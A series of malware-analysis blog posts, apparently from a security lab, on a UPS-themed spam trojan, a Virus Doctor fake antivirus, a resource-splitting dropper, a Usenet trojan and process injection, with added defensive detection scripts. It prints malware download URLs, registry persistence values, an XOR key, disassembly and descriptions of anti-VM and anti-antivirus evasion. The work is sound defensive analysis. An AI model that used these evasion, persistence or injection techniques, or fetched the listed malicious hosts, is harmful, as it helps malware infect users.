UPS Delivery Problem NR 72246. - New Spam hits On The INBOX
by Rajesh Nataraj Kumar Pillai
New spam hit the internet on 5th May. I searched Google for information about this fake mail but could not find any, so we are posting it on our blog with high priority to warn online users.
Check out the body of the fake message below.
It is a spoofed message sent from an infected botnet to deceive the user.
The malicious zip attachment contains an exe file with a Microsoft Word document icon, to trick the user into running the malware. It is packed under the name "UPS_invoice_4228".
If the user runs the malicious file on his system, it drops a DLL named "pgsb.lto", and this DLL is loaded into memory along with explorer.exe when the system is restarted:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe rundll32.exe pgsb.lto csxyfxr"
The dropped file tries to contact the following address:
hxxp://davidopolko.ru/migel/bb.php
The DLL silently connects to an authenticated HTTP server to download the rogue antispyware InternetSecurity2010.
Once the rogue is installed on the system, it shows annoying messages and pop-ups that create panic and trick the user into buying the rogue antispyware software.
So users, be safe while using the internet. Don't trust strangers.
Beware of searching for Icelandic Volcano!!!
by Sriram.P
We use Google search for every instance in our life, from gardening to university study to keeping ourselves updated. How about a search for details on the recent Iceland volcanic activity leading to malware? Dangerous, isn't it? But this does occasionally occur. We need to be careful about the sites we visit from Google search results. Google is making the maximum effort to keep bad results out, but we still need to be careful.
This morning, while casually searching Google in my Opera browser for the latest updates on the volcanic activity, I was led to a fantasy: a message box saying "Warning! Your computer is at risk of malware attacks". I was happy: I had caught a rogue, a Fake-Alert, and thought of investigating it. I moved the message box aside and found my browser minimized under it. I have attached the screenshot below (taken in Firefox).
The message box warned me that "Warning! Your system is at risk of malware attacks" and assured me it would help strengthen my system. I was panicked and agreed by clicking OK. It then opened a Firefox window and started scanning my system, even displaying my IP address and my system environment parameters.
After the scan completed, it alerted me that my system had a lot of problems that needed fixing (check the screenshot below). The problems reported were: 1. registry to be fixed, 2. remove outdated temporary junk files, 3. hard disk defragmentation, 4. disk surface analysis, 5. webpage download speed.
I clicked the message box and it prompted me to download and save a file named "packupdate_build30_287.exe", which I did. The hashes of the file are:
MD5: 9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0
Now, I let the file execute. It started extracting.
After extracting a system scan started.
Finally,
My system is infected now!! Panic at the extreme!! Wanting to fix it, I clicked "remove all". It was kind enough to open a window asking me to buy protection for 6 months ($65.00) or 1 year ($100.00).
Should I buy?
No, without any doubt. I know that I executed the file in a cleanly built WinXP SP2 virtual machine test environment in non-persistent mode, so there is no chance of my system getting infected.
I wanted to know more about its behavior and started to analyze it. This standalone executable is UPX packed. After a long time spent understanding the packer and unpacking the file, I finally found the entry point at:
0042905C E8 59960000 CALL packupda.004326BA
On analyzing the strings, I found it could be a variant of the famous rogue "Virus Doctor". It creates the mutex:
004140D9 |> 68 48414000 PUSH 123.00404148 ; /MutexName = "VirusDoctorInstallerMutex"
This file doesn't do anything remarkable; it just downloads a file from "update1.savecompnow.com" with a special GET request:
GET /index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)
Host: update1.savecompnow.com
With the above request, it downloads a file "MS64d4.exe" to "C:\Documents and Settings\All Users\Application Data\64d44d4", with hashes
MD5: 67a790897462d3b238db34d53420f13a
SHA-1: 2ab7447375132b7f9367936b241913a25c4b2c71
and executes the file with the command line parameters
""C:\Documents and Settings\All Users\Application Data\64d44d4\MS64d4.exe" /s /i /uid=287 /ls=30 "
/s - Silent
/i - Install
If you browse to "update1.savecompnow.com" with a browser like IE or Firefox, it displays:
ABBR is not properly set
SetupType is not properly set
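The downloader's GET request above has a distinctive shape (controller=microinstaller plus the abbr and setupType parameters the server insists on) and a malformed User-Agent. The following matcher is an added example, not code from FSB Security Labs; it runs over constructed proxy log lines in a made-up format, so the field order and the timestamps are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from any real proxy): time, client IP, method, URL,
# quoted User-Agent. The first two replay the downloader's request seen above.
SAMPLE_LOG = [
    '2010-04-20T09:12:01 10.0.0.5 GET http://update1.savecompnow.com/index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= "Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)"',
    '2010-04-20T09:12:07 10.0.0.5 GET http://update1.savecompnow.com/index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= "Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)"',
    '2010-04-20T09:13:44 10.0.0.7 GET http://www.example.com/index.php?controller=shop&id=3 "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)"',
]

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
# The rogue's UA has no space after "Windows;" and a bare "en;" locale, unlike a real Firefox UA.
BAD_UA_RE = re.compile(r'Windows;U;.*; en;\)$')

def parse_line(line):
    """Split one constructed log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url, "ua": ua}

def is_microinstaller_request(url):
    """True when the query carries the downloader's fingerprint: controller=microinstaller
    together with the abbr and setupType parameters."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("controller") == ["microinstaller"] and "abbr" in q and "setupType" in q

def scan(lines):
    """Return (client, host, reason) for every line matching the downloader pattern."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        host = urlsplit(rec["url"]).hostname
        if is_microinstaller_request(rec["url"]):
            hits.append((rec["client"], host, "microinstaller GET"))
        elif BAD_UA_RE.search(rec["ua"]):
            hits.append((rec["client"], host, "malformed rogue User-Agent"))
    return hits

if __name__ == "__main__":
    for client, host, reason in scan(SAMPLE_LOG):
        print(f"{client} -> {host}: {reason}")
```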
Tip: You can stop your browser from being resized by changing the JavaScript setting in Firefox as shown below.
Trojan MultiDrop
by Sriram.P
Some time ago I was given this link to analyse:
hxxp://real-tube.org/watch.php?id=172
When I accessed the link, it asked me to download and install a codec to view the video, as shown below.
[Fig1 Prompt me to download Window]
As usual, I grew suspicious. I downloaded the exe and started to analyse it.
Filename: codec.exe
MD5: c356db0ffc2a6cf777873bcaa8dee442
SHA-1: eb17ef1ffc66be649fb2e24ec82d207a74e535b6
When I saw the resources, I was surprised and understood the malware writer's motive instantly. I hope you will also see his motive from the preview below.
[Fig2 Motive of the binary.]
Yes, it is simple. The malware writer has split a binary into multiple parts inside the resources and packed the executable. Here I should really appreciate his patience in carefully crafting the binary.
After this, I loaded the binary into the disassembler and found his motive to be even simpler. He has countered the 3 major steps a typical anti-virus organisation takes when it receives a file:
- He has added a time-based check using RDTSC so that the file crashes under automated malware analysis systems and cannot be analysed there.
- He has encrypted all strings and API calls.
- He has split the data and increased the resource count, making heuristic AV engines ignore the file inside.
He has also added another interesting feature, which I shall explain in the post that analyses the dropped DLL.
Let me now explain each of his motives. The function at "004002D8" has a loop with an RDTSC time-based check. VMware is really bad at handling the RDTSC instruction. The function returns a value which he compares with a fixed value, 0xC8. If it is less (in a VM, or when being stepped through in a debugger, the value returned is unpredictably large), the instructions at 0x400000 are executed, which is code bad enough to crash the file. (An automated analysis system records that the file does not execute and crashes.) Check out the image below!
[Fig3. Crash when executed in a VM]
I bypassed this simple check, which led to a series of functions that decrypt strings and load APIs. His simple motive is to drop two files into the system directory, named "0041.DLL" and "Work.dat", and then create the registry entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"LoadAppInit_DLLs" = "0041.DLL" so that this DLL is loaded with every file being executed. He used the callback function of the API "kernel32.EnumResourceNamesA" to create the files easily. This API is widely used by the malware variant which KAV detects as "Trojan-Dropper.Win32.MuDrop".
I shall continue with the DLL's activity in the next post.
It's just another Trojan But Getting Innovative
by Sriram.P
On 29/03/2010, our lab's sample collection received a file named "Gorillaz_-_Plastic_Beach_[2010-MP3-Cov][Bubanee].exe" with MD5 '412d9834c54f4b5305bb94b4bc412fd2'. It was interesting to analyse because the file was compiled with VC++ and has been obfuscated with random opcodes to confuse anti-virus engines. Similar activity and obfuscation were found in the files "Justified_S01E03_HDTV_XviD-XII_[eztv].exe" and "Kesha_-_Animal_[New_Album]marty70.exe". An example of such obfuscation can be seen in the image below.
[Fig 1 - Obfuscation Debugged with Olly Debugger]
This trojan does exactly what a trojan does. It comes into the system mainly from Usenet with a deceiving filename and size, which makes an ordinary user execute it. On execution it takes the data stored in the resource named "RTDATA" and moves it to another location with "RtlMoveMemory". It then calls a decryption function that takes 4 arguments, where Arg3 (the value in EAX) is the memory to be decrypted and Arg2 is the key "07460E7243165A8C", as illustrated below.
0040DAD8 |. 6A 10 PUSH 10 ; /Arg4 = 00000010
0040DADA |. 50 PUSH EAX ; |Arg3
0040DADB |. 68 50814100 PUSH [FilNam].00418150 ; |Arg2 = 00418150 ASCII "07460E7243165A8C"
0040DAE0 |. 51 PUSH ECX ; |Arg1
0040DAE1 |. E8 2A4CFFFF CALL [FilNam].00402710 ; \Gorillaz.00402710
This value is treated as a byte array and used to XOR-decrypt the extracted resource contents; the decoded bytes are then injected into a process of the same name, created with the API "CreateProcessA". All malicious activity is done by this injected resource code.
This file is a purely custom compiled executable and does a lot of naughty stuff. It first executes a lot of interesting code to load the import table. It checks whether the current module filename is "C:\Program Files\Microsoft Common\svchost.exe"; if not, it copies the file there and finally terminates the thread with "ZwSetInformationThread" as shown below.
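The decryption step just described, as an added example rather than code from the sample or from FSB Security Labs: a repeating-key XOR with the 16-byte key pushed as Arg2, followed by the header check an analyst applies to confirm the decoded bytes are the PE image that gets injected. Treating Arg4 = 0x10 as the key length, and the minimal fake PE used as input, are assumptions.

```python
# Key string seen in the Arg2 push above. Using Arg4 = 0x10 as its length is an assumption.
KEY = b"07460E7243165A8C"

def xor_crypt(data: bytes, key: bytes = KEY) -> bytes:
    """XOR each byte with the key byte at the same position modulo len(key).
    XOR is its own inverse, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def looks_like_pe(data: bytes) -> bool:
    """Analyst sanity check: a payload handed to CreateProcess-style injection should be
    a PE image, i.e. 'MZ' at offset 0 and 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def decrypt_resource(resource: bytes, key: bytes = KEY):
    """Decrypt an extracted RTDATA-style blob and return it only if the result is a PE
    image; None means the key (or the assumed key length) is wrong."""
    plain = xor_crypt(resource, key)
    return plain if looks_like_pe(plain) else None

def build_fake_pe() -> bytes:
    """Constructed stand-in for the real payload: a minimal DOS header whose e_lfanew
    points at a PE signature. Not runnable code, just enough for the header check."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20

if __name__ == "__main__":
    # Simulate the packed resource: the XOR-encrypted image, then recover it.
    packed = xor_crypt(build_fake_pe())
    print("encrypted blob looks like PE:", looks_like_pe(packed))
    print("decrypted blob looks like PE:", decrypt_resource(packed) is not None)
```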
00402E9E 6A 00 PUSH 0
00402EA0 6A 00 PUSH 0
00402EA2 6A 11 PUSH 11
00402EA4 6A FE PUSH -2
00402EA6 FF15 87414000 CALL DWORD PTR DS:[404187] ; ntdll.ZwSetInformationThread
It places a simple registry Run entry as shown below.
0040254C |. 50 PUSH EAX ; /pHandle
0040254D |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00402552 |. 6A 00 PUSH 0 ; |Reserved = 0
00402554 |. 68 94254000 PUSH _0015000.00402594 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
00402559 |. 51 PUSH ECX ; |hKey
0040255A |. FF15 86404000 CALL DWORD PTR DS:[404086] ; \RegOpenKeyExA
00402560 |. 85C0 TEST EAX,EAX
00402562 |. 75 2E JNZ SHORT _0015000.00402592
00402564 |. FF35 B9384000 PUSH DWORD PTR DS:[4038B9] ; /String = "C:\Program Files\Microsoft Common\svchost.exe"
0040256A |. FF15 733D4000 CALL DWORD PTR DS:[403D73] ; \lstrlenA
00402570 |. 50 PUSH EAX ; /BufSize
00402571 |. FF35 B9384000 PUSH DWORD PTR DS:[4038B9] ; |Buffer = 000993B8
00402577 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00402579 |. 6A 00 PUSH 0 ; |Reserved = 0
0040257B |. 68 C2254000 PUSH _0015000.004025C2 ; |ValueName = "svchost"
00402580 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |hKey
00402583 |. FF15 AE404000 CALL DWORD PTR DS:[4040AE] ; \RegSetValueExA
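The three persistence mechanisms described on this blog (the Winlogon Shell value from the UPS post, the LoadAppInit_DLLs value from the MultiDrop post, and the Run entry above) can be audited together. The auditor below is an added example, not code from FSB Security Labs; it runs over a constructed .reg export rather than the live registry, and its rules are heuristics (a legitimate Shell value is plain explorer.exe; a Run entry borrowing a system binary name outside the Windows directory is suspect).

```python
import re

# Constructed .reg export (not from a real machine). The three persistence values are the
# ones described in this and the earlier posts (Winlogon Shell, LoadAppInit_DLLs, the
# "svchost" Run value); the ctfmon entry is a legitimate one the auditor must leave alone.
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe rundll32.exe pgsb.lto csxyfxr"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs"="0041.DLL"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\\Program Files\\Microsoft Common\\svchost.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

# Names of Windows binaries that malware likes to borrow for its own files.
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "rundll32.exe", "lsass.exe", "csrss.exe"}

def parse_reg(text):
    """Parse .reg export text into {key: {value_name: data}} (string values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        m = re.match(r'^\[(.+)\]$', line.strip())
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line.strip())
        if m and current is not None:
            current[m.group(1)] = m.group(2).replace('\\\\', '\\')
    return keys

def audit(keys):
    """Return (key, value_name, reason) for every suspicious persistence entry."""
    findings = []
    for key, values in keys.items():
        tail = key.lower().rsplit('\\', 1)[-1]       # last key component: winlogon/windows/run
        for name, data in values.items():
            low = data.lower().strip()
            if tail == 'winlogon' and name.lower() == 'shell' and low != 'explorer.exe':
                findings.append((key, name, 'Shell runs more than explorer.exe'))
            elif tail == 'windows' and 'appinit' in name.lower() and low.endswith('.dll'):
                findings.append((key, name, 'AppInit DLL loaded into every process'))
            elif tail == 'run':
                directory, _, base = low.rpartition('\\')
                if base in SYSTEM_NAMES and not directory.startswith('c:\\windows'):
                    findings.append((key, name, 'system binary name outside the Windows directory'))
    return findings

if __name__ == '__main__':
    for key, name, reason in audit(parse_reg(SAMPLE_REG)):
        print(f'{reason}: {key}\\{name}')
```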
It then creates a thread which every 2 seconds copies this file to every drive of the system as "Autorun.exe".
The main thread continues by trying to download a file from the location shown below every "1320000 ms".
0006FF9C 008BFE48 ASCII "http://czickenpower.com/a/ld.php?v=1&rs=76487-640-1457236-236512151071260&n=1&uid=1"
The malware writer was successful in his obfuscation technique, because he tested the patience of a reverse engineer like me: it took a full hour to understand, analyse and report on the file. I took it as a challenge and completed it. Thank you for reading the post. Hope it was useful.
The next generation of Process Injectors is here
by Sriram.P
Injectors are a kind of trojan activity that ensures the payload is installed, executed correctly and hidden perfectly.
Currently prevalent process injectors inject infection code into other processes, or into processes they create themselves in a suspended state. The classic example is the Backdoor.Win32.Hupigon family, whose variants create, for example, iexplore.exe in a suspended state, replace the original process code with the injected malcode, and execute it. The original idea is to bypass firewall rules: most firewalls write rules keyed to a particular process name and path, and nearly everyone's firewall configuration allows the iexplore.exe process. This technique is very effective at bypassing even most of today's firewalls.
The common API sequence used by a typical injector is:
CreateProcess : Creates a process in a suspended state. The process can be iexplore.exe or any other legitimate process that serves the malware writer's purpose. In some cases it can even be the name of the same executable.
WriteProcessMemory / ReadProcessMemory : These read from and write to the process space of the newly created process.
ResumeThread : Resumes the thread handle of the suspended created process.
Some other process injectors add variants like CreateRemoteThread or SetThreadContext to execute or hijack the code inserted in the remote process memory space.
All these were the techniques used by most malware writers during 2008-2009. We at FSB Security Labs have seen a steep increase in such malware being written. Nowadays they have gone a step further with the use of undocumented APIs like ZwWriteVirtualMemory instead of WriteProcessMemory and ZwReadVirtualMemory instead of ReadProcessMemory. The main advantage of this technique is simply that it is not monitored by many of the internet security suites available on the market. Ordinary automated malware detection systems do not monitor these APIs either, unless they are upgraded.
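The point of the last paragraph can be shown as a detection rule: a monitor that only hooks WriteProcessMemory misses the same CreateProcess(suspended) -> write -> ResumeThread chain once the write goes through ZwWriteVirtualMemory. The following is an added example from the editor, not FSB Security Labs code; it runs over a constructed sandbox-style API trace whose line format, pids and argument names are assumptions.

```python
# Constructed sandbox-style API trace (not the output of any real tool). Each line carries
# the calling pid, the API name and the arguments an analyst would look at.
SAMPLE_TRACE = """
pid=100 api=CreateProcessA image=iexplore.exe flags=0x4
pid=100 api=ZwWriteVirtualMemory target_pid=200
pid=100 api=ResumeThread target_pid=200
pid=300 api=CreateProcessA image=notepad.exe flags=0x0
pid=300 api=WriteProcessMemory target_pid=400
pid=500 api=CreateProcessA image=svchost.exe flags=0x4
pid=500 api=WriteProcessMemory target_pid=600
pid=500 api=SetThreadContext target_pid=600
pid=500 api=ResumeThread target_pid=600
"""

CREATE_SUSPENDED = 0x4   # dwCreationFlags bit for a process created suspended
# What a user-mode-only monitor hooks versus what is needed once Zw*/Nt* variants are used.
WRITE_APIS_USER = {"WriteProcessMemory"}
WRITE_APIS_ALL = WRITE_APIS_USER | {"NtWriteVirtualMemory", "ZwWriteVirtualMemory"}
EXEC_APIS = {"ResumeThread", "CreateRemoteThread", "SetThreadContext"}

def parse_trace(text):
    """Turn each trace line into a dict of its key=value fields."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.strip().splitlines()]

def detect_injection(events, write_apis):
    """Per calling pid, look for CreateProcess* with CREATE_SUSPENDED, then a memory write
    via one of write_apis, then a thread-execution API. Returns {pid: api chain seen}."""
    stage, chain, hits = {}, {}, {}
    for ev in events:
        pid, api = ev["pid"], ev["api"]
        if api.startswith("CreateProcess") and int(ev.get("flags", "0"), 16) & CREATE_SUSPENDED:
            stage[pid], chain[pid] = 1, [api]           # stage 1: suspended child exists
        elif stage.get(pid) == 1 and api in write_apis:
            stage[pid] = 2                               # stage 2: its memory was written
            chain[pid].append(api)
        elif stage.get(pid) == 2 and api in EXEC_APIS:
            chain[pid].append(api)                       # stage 3: injected code started
            hits[pid] = chain[pid]
    return hits

if __name__ == "__main__":
    events = parse_trace(SAMPLE_TRACE)
    print("user-mode hooks only:", sorted(detect_injection(events, WRITE_APIS_USER)))
    print("with Zw/Nt variants :", sorted(detect_injection(events, WRITE_APIS_ALL)))
```

Pid 300 is never flagged in either mode because its child was not created suspended, which keeps the rule from firing on ordinary process creation followed by an unrelated write.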